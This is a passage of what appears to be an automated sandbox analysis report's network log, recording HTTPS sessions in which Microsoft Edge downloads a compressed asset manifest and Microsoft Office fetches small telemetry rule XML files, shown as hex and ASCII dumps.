91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e Data Ascii: *'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49811	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:22 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:23 UTC	577	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:22 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: 6d5c7e92-401e-0049-21b4-2e5b67000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035522Z-16547b76f7fp6mhthC1DFWrggn0000000c4g00000000ggwc Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:23 UTC	15807	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c Data Ascii: u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d Data Ascii: ,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 Data Ascii: B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M,SqP
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e Data Ascii: kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.V
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 Data Ascii: {M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@
2024-11-10 03:55:23 UTC	16384	IN	Data Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:23 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:23 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:23 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: cc46dee9-d01e-007a-0efd-2cf38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035523Z-16547b76f7fmbrhqhC1DFWkds80000000c4g00000000b0zd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:23 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:23 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:23 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: e990a561-401e-0016-7262-3253e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035523Z-17df447cdb5l865xhC1DFW9n7g00000005dg0000000008pq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:23 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.5	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:23 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:23 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 317e81ca-d01e-0049-70bf-31e7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035523Z-15869dbbcc6pfq2ghC1DFWmp1400000005a000000000g6tm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:23 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.5	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:23 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:23 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: a07dceec-d01e-0066-4c3b-2eea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035523Z-15869dbbcc6lq2lzhC1DFWym6c00000007dg000000001qvb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:23 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.5	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:23 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:23 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:23 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035523Z-16547b76f7f22sh5hC1DFWyb4w0000000c4000000000074v x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:23 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49823	13.91.96.185	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
